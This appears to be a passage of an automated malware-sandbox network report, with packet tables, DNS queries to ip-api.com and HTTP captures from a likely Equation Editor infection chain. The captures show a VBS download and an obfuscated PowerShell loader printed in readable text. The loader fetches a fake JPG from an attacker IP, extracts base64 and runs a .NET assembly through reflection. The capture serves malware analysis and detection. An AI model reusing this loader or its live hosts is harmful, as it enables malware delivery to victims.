                  Jul 5, 2024 07:26:50.098042965 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098053932 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098063946 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098074913 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098084927 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098087072 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.098095894 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098104954 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.098108053 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098120928 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098129988 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.098133087 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098144054 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098155975 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098164082 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.098191977 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.098799944 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098809958 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098819971 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098829985 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098840952 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098843098 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.098850965 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098860979 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.098861933 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098874092 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098884106 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098887920 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.098892927 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098897934 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.098906040 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098916054 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098927975 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098929882 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.098941088 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.098956108 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.098983049 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.099482059 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099493027 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099503040 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099514008 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099524975 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099524975 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.099535942 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099544048 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.099546909 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099558115 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099569082 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099570990 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.099580050 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099590063 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.099592924 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099605083 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099616051 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099622965 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.099627018 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.099637985 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.099663019 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.099728107 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100486994 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100497007 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100506067 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100517988 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100529909 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.100531101 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100542068 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100553036 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100558043 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.100564003 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100574017 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.100575924 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100589037 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100600004 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100601912 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.100610018 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100620985 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.100620985 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100632906 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100644112 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.100653887 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.100676060 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.101201057 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.101212025 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.101224899 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.101236105 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.101246119 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.101252079 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.101258039 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.101270914 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.101274014 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.101281881 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.101293087 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.101294041 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.101306915 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.101316929 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.101349115 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.139008045 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.139230967 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.139241934 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.139266968 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.139272928 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.139362097 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.139375925 CEST8049178198.46.178.144192.168.2.22
                  Jul 5, 2024 07:26:50.139399052 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.220536947 CEST4917880192.168.2.22198.46.178.144
                  Jul 5, 2024 07:26:50.886868954 CEST4917980192.168.2.22208.95.112.1
                  Jul 5, 2024 07:26:50.891647100 CEST8049179208.95.112.1192.168.2.22
                  Jul 5, 2024 07:26:50.891705990 CEST4917980192.168.2.22208.95.112.1
                  Jul 5, 2024 07:26:50.893003941 CEST4917980192.168.2.22208.95.112.1
                  Jul 5, 2024 07:26:50.898828983 CEST8049179208.95.112.1192.168.2.22
                  Jul 5, 2024 07:26:51.372231960 CEST8049179208.95.112.1192.168.2.22
                  Jul 5, 2024 07:26:51.481093884 CEST4917780192.168.2.22208.95.112.1
                  Jul 5, 2024 07:26:51.583098888 CEST8049179208.95.112.1192.168.2.22
                  Jul 5, 2024 07:26:51.585407019 CEST4917980192.168.2.22208.95.112.1
                  TimestampSource PortDest PortSource IPDest IP
                  Jul 5, 2024 07:26:29.410799980 CEST5456253192.168.2.228.8.8.8
                  Jul 5, 2024 07:26:29.420347929 CEST53545628.8.8.8192.168.2.22
                  Jul 5, 2024 07:26:29.420641899 CEST5456253192.168.2.228.8.8.8
                  Jul 5, 2024 07:26:29.430147886 CEST53545628.8.8.8192.168.2.22
                  Jul 5, 2024 07:26:34.284921885 CEST5291753192.168.2.228.8.8.8
                  Jul 5, 2024 07:26:34.293628931 CEST53529178.8.8.8192.168.2.22
                  Jul 5, 2024 07:26:36.351592064 CEST6275153192.168.2.228.8.8.8
                  Jul 5, 2024 07:26:36.360402107 CEST53627518.8.8.8192.168.2.22
                  Jul 5, 2024 07:26:39.920664072 CEST5789353192.168.2.228.8.8.8
                  Jul 5, 2024 07:26:39.927881956 CEST53578938.8.8.8192.168.2.22
                  Jul 5, 2024 07:26:45.366710901 CEST5482153192.168.2.228.8.8.8
                  Jul 5, 2024 07:26:45.373306036 CEST53548218.8.8.8192.168.2.22
                  Jul 5, 2024 07:26:50.863420963 CEST5471953192.168.2.228.8.8.8
                  Jul 5, 2024 07:26:50.872364998 CEST53547198.8.8.8192.168.2.22
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 5, 2024 07:26:29.410799980 CEST192.168.2.228.8.8.80x1853Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                  Jul 5, 2024 07:26:29.420641899 CEST192.168.2.228.8.8.80x1853Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                  Jul 5, 2024 07:26:34.284921885 CEST192.168.2.228.8.8.80xe94Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                  Jul 5, 2024 07:26:36.351592064 CEST192.168.2.228.8.8.80xe0e8Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                  Jul 5, 2024 07:26:39.920664072 CEST192.168.2.228.8.8.80x7e52Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                  Jul 5, 2024 07:26:45.366710901 CEST192.168.2.228.8.8.80xe15dStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                  Jul 5, 2024 07:26:50.863420963 CEST192.168.2.228.8.8.80xbd6bStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 5, 2024 07:26:29.420347929 CEST8.8.8.8192.168.2.220x1853No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                  Jul 5, 2024 07:26:29.430147886 CEST8.8.8.8192.168.2.220x1853No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                  Jul 5, 2024 07:26:34.293628931 CEST8.8.8.8192.168.2.220xe94No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                  Jul 5, 2024 07:26:36.360402107 CEST8.8.8.8192.168.2.220xe0e8No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                  Jul 5, 2024 07:26:39.927881956 CEST8.8.8.8192.168.2.220x7e52No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                  Jul 5, 2024 07:26:45.373306036 CEST8.8.8.8192.168.2.220xe15dNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                  Jul 5, 2024 07:26:50.872364998 CEST8.8.8.8192.168.2.220xbd6bNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                  • 198.46.178.144
                  • 91.92.254.14
                  • 91.92.254.194
                  • ip-api.com
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.2249161198.46.178.144801444C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:21.043065071 CEST338OUTGET /controlfiredatinloverforxlammfile.vbs HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 198.46.178.144
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:21.541920900 CEST970INHTTP/1.1 200 OK
                  Content-Type: text/vbscript
                  Content-Encoding: gzip
                  Last-Modified: Thu, 04 Jul 2024 18:55:49 GMT
                  Accept-Ranges: bytes
                  ETag: "80a8edc843ceda1:0"
                  Vary: Accept-Encoding
                  Server: Microsoft-IIS/10.0
                  Date: Fri, 05 Jul 2024 05:26:21 GMT
                  Content-Length: 694
                  Data Raw: 1f 8b 08 00 00 00 00 00 04 00 dc 96 4b 6f da 40 14 85 cf ba 52 ff 03 62 11 b5 52 4b 12 d4 2c 52 a9 8b 84 a6 24 c5 35 a4 21 72 c5 26 0a 06 82 63 30 2f 3b 8d f2 e3 db 7e f7 62 a2 54 5d 74 6f 8d e6 75 df e7 8c 87 e1 f7 af cf 4a 34 57 8d de 55 ae 47 5d b2 2f d4 51 a8 89 02 9d 6b c3 be a3 29 fa 16 fb 48 3d 0d 99 63 b7 c8 b4 d0 b5 4e b4 66 17 b0 4f f4 a4 01 7a 9b d7 6a e3 91 a0 8d 74 8a fd a9 52 e2 46 c4 8f 35 c2 26 a5 d9 2a 64 0e d1 14 78 64 44 1b 50 47 8a 6f 87 39 d0 2d ab 94 28 03 6c be b3 b2 dc 29 ba 36 91 06 58 6f 23 04 b4 47 ad a8 3f d0 3b b0 7c 75 59 ca be 07 82 a5 57 17 d1 db 54 73 4f 55 e6 3f 65 bc 76 1c 57 68 96 e0 5b 13 3d a6 0d 41 1e 61 15 91 b7 a7 31 56 09 38 17 e4 8b 68 13 34 73 f7 33 9c 2b e2 18 62 93 04 8e 30 47 53 20 9b 93 6b 49 1d 4f 58 45 20 0b 61 72 e2 da 07 34 63 64 0b d6 8f ce e1 ad d7 14 92 e9 52 77 ec ba ec c6 9a e9 b5 5e 51 dd 18 af ea 9c 4f 4d 9f e8 2d a2 8d f1 ce 19 bb 78 dd 33 c7 ec de a8 ae 6f 60 fe c1 18 a8 a9 86 e3 5f c3 99 8d 5b e9 b9 fa b4 1e 96 6f 9d a1 aa 30 d3 c0 6f 09 [TRUNCATED]
                  Data Ascii: Ko@RbRK,R$5!r&c0/;~bT]touJ4WUG]/Qk)H=cNfOzjtRF5&*dxdDPGo9-(l)6Xo#G?;|uYWTsOU?evWh[=Aa1V8h4s3+b0GS kIOXE ar4cdRw^QOM-x3o`_[o0o~s9mc#}`>d'{@!C fo_xU7N/yj1~Gg-VP5u@]M*[9Exvt/n81cSB= 'e}jPi!F``8O8c:kvbWo5"CmmUh1oMU8i(=owMk/*lhUooE;9vgK]rg


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.224916291.92.254.1480380C:\Windows\SysWOW64\wscript.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:21.901509047 CEST211OUTGET /Users_API/negrocock/file_omquennq.l51.txt HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: 91.92.254.14
                  Jul 5, 2024 07:26:22.515642881 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:22 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                  Last-Modified: Thu, 04 Jul 2024 18:55:49 GMT
                  ETag: "1e2b-61c707ed24691"
                  Accept-Ranges: bytes
                  Content-Length: 7723
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/plain
                  Data Raw: ef bb bf 49 4e 56 4f 6b 45 2d 45 58 70 52 65 73 73 49 6f 6e 20 28 20 28 27 6f 69 4c 27 2b 27 6c 69 27 2b 27 6e 27 2b 27 6b 20 3d 20 4f 6c 73 68 74 74 70 27 2b 27 3a 2f 2f 39 31 2e 39 32 2e 32 35 34 2e 31 39 34 2f 69 6d 67 65 2f 6e 65 77 2d 69 6d 61 67 65 27 2b 27 5f 76 2e 6a 70 67 4f 6c 73 3b 20 6f 69 4c 77 65 62 43 6c 69 65 6e 74 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 27 2b 27 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 3b 20 74 72 79 20 7b 20 6f 69 4c 64 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 20 3d 20 6f 69 27 2b 27 4c 77 65 62 43 6c 69 65 6e 74 2e 44 6f 77 6e 6c 6f 61 64 44 61 74 61 28 6f 69 4c 6c 69 6e 6b 29 20 7d 20 63 61 74 63 68 20 7b 20 57 72 69 74 65 2d 48 6f 73 74 20 4f 6c 73 46 61 69 6c 65 64 20 54 6f 20 64 6f 77 6e 6c 6f 61 64 20 64 61 74 61 20 66 72 6f 6d 20 6f 69 4c 6c 69 6e 6b 4f 6c 73 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 52 65 64 3b 20 65 78 69 74 20 7d 3b 20 69 66 20 28 6f 69 4c 64 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 20 2d 6e 65 20 6f 69 4c 6e [TRUNCATED]
                  Data Ascii: INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'l
                  Jul 5, 2024 07:26:22.515687943 CEST1236INData Raw: 6f 61 64 65 64 41 73 73 65 6d 62 6c 79 20 3d 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 6f 69 4c 63 6f 6d 6d 27 2b 27 61 6e 64 42 79 74 65 73 29 3b 20 6f 69 4c 74 79 70 65 20 3d 20
                  Data Ascii: oadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'9
                  Jul 5, 2024 07:26:22.515700102 CEST1236INData Raw: 6e 64 29 3b 20 6f 69 4c 6c 6f 61 64 65 64 41 73 73 65 6d 62 6c 79 20 3d 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 27 2b 27 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 6f 69 4c 63 6f 6d 6d 61 6e 64 42 79 74 65 73 29 3b 20 6f
                  Data Ascii: nd); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbb
                  Jul 5, 2024 07:26:22.515799046 CEST1236INData Raw: 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 27 2b 27 72 69 6e 67 28 6f 69 4c 62 61 73 65 36 34 43 6f 6d 6d 61 6e 64 29 3b 20 6f 69 4c 6c 27 2b 27 6f 61 64 65 64 41 73 73 65 6d 62 6c 79 20 3d 20 5b 53 79 73 74 65 6d 2e 52
                  Data Ascii: .Convert]::FromBase64St'+'ring(oiLbase64Command); oiLl'+'oadedAssembly = [System.Reflection.Assembly]::Load(oiLcommandBytes); oiLtype = oiLloadedAssembly.GetType(OlsRu'+'nPE.HomeO'+'ls); oiLmet'+'hod = oiLtype.GetMethod(Ol'+'sVA'+'IOls).Invoke
                  Jul 5, 2024 07:26:22.515810966 CEST896INData Raw: 69 4c 63 6f 6d 6d 61 6e 64 42 79 74 65 73 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 27 2b 27 28 6f 69 4c 62 61 73 27 2b 27 65 36 34 27 2b 27 43 6f 6d 6d 61 6e 64 29 27 2b 27 3b
                  Data Ascii: iLcommandBytes = [System.Convert]::FromBase64String'+'(oiLbas'+'e64'+'Command)'+'; oiLloadedAssembly = [System.Reflection.Assembly]::Load(oiLcommandBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE'+'.HomeOls); oiLmethod = oiLtype.GetMethod
                  Jul 5, 2024 07:26:22.594182968 CEST1236INData Raw: 20 6f 69 4c 65 6e 64 46 6c 61 67 20 3d 20 4f 6c 73 3c 3c 42 41 53 45 36 34 5f 45 4e 44 3e 3e 4f 6c 73 3b 20 6f 69 4c 73 74 61 72 74 49 6e 64 65 78 20 3d 20 6f 69 4c 69 6d 61 67 65 54 65 78 74 2e 49 6e 64 65 78 4f 66 28 6f 69 27 2b 27 4c 73 74 61
                  Data Ascii: oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oi'+'LstartFlag); oiLendIndex = oiLimageText.I'+'ndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIndex -gt oiLstartIndex) { oiLstartIndex += oiLst'+'ar'+'tFlag.Le'
                  Jul 5, 2024 07:26:22.594196081 CEST959INData Raw: 69 4c 64 27 2b 27 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 29 3b 20 6f 69 4c 73 74 61 72 74 46 6c 61 67 20 3d 20 4f 6c 73 3c 3c 42 41 53 45 36 34 5f 53 54 41 52 54 3e 3e 4f 6c 73 3b 20 6f 69 4c 27 2b 27 65 6e 64 46 6c 61 67 20 3d 20 4f 6c 73 3c 3c
                  Data Ascii: iLd'+'ownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiL'+'endFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag);'+' if (oiLstartIndex -ge 0 -and oiLendIndex


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.224916391.92.254.194801904C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:23.909750938 CEST83OUTGET /imge/new-image_v.jpg HTTP/1.1
                  Host: 91.92.254.194
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:24.556164980 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:24 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                  Last-Modified: Wed, 03 Jul 2024 13:17:15 GMT
                  ETag: "67fd9-61c57a629b9c6"
                  Accept-Ranges: bytes
                  Content-Length: 425945
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: image/jpeg
                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                  Jul 5, 2024 07:26:24.556272030 CEST1236INData Raw: 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04 05 2b
                  Data Ascii: C.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:{
                  Jul 5, 2024 07:26:24.556284904 CEST1236INData Raw: e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c
                  Data Ascii: p\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
                  Jul 5, 2024 07:26:24.556294918 CEST672INData Raw: 9b 1b 8e 59 08 20 77 ef 81 b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a
